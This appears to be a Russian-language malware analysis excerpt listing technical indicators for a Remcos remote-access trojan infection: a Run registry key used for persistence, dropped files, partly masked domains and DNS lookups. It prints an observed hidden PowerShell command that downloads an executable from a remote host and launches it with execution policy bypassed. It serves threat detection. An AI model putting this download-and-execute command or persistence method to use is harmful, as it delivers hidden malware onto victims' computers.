Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run\] 'remoteaccess' = '"%APPDATA%\vlc\remcos.exe"'
- http://sa###hamatan.ir/js/nw.exe как %appdata%\putty.exe
- remcos.exe
- %TEMP%\abctfhghghghghž.sct
- %APPDATA%\putty.exe
- %APPDATA%\vlc\remcos.exe
- %TEMP%\install.vbs
- %APPDATA%\app\logs.dat
- %TEMP%\install.vbs
- http://sa###hamatan.ir/js/NW.exe
- DNS ASK sa###hamatan.ir
- DNS ASK no#####gy.myq-see.com
- '%APPDATA%\putty.exe'
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\install.vbs"
- '%APPDATA%\vlc\remcos.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://sa###hamatan.ir/js/NW.exe','%APPDATA%\putty.exe');Start-Process '%APPD...' (со скрытым окном)
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\install.vbs"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c "%APPDATA%\vlc\remcos.exe"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c "%APPDATA%\vlc\remcos.exe"